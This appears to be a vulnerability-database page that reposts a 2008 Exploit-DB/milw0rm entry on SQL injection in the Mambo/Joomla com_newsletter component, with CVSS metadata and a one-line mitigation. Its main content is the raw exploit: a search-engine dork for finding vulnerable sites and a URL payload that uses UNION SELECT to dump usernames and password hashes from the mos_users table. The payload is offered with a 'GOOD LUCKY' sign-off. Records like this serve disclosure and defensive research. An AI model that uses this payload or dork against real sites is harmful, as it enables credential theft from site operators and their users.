Joomla SQL Injection (com_newsletter)

vendor:

Newsletter component

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Newsletter component

Affected Version From: Mambo 4.5

Affected Version To: Mambo 4.5

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla SQL Injection (com_newsletter)

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The attacker can inject malicious SQL queries in the vulnerable parameter and execute arbitrary SQL commands on the underlying database.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_newsletter)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_newsletter"
#
########################################################################
EXPLOIT :

index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

#########################################################################
# S@BUN                       www.hackturkiye.com                    S@BUN
#########################################################################
# S@BUN                            GOOD LUCKY                            S@BUN
#########################################################################




notes:
"Newsletter component for mambo 4.5" from Adam van Dongen, www.tim-online.nl //Thanks George

# milw0rm.com [2008-01-29]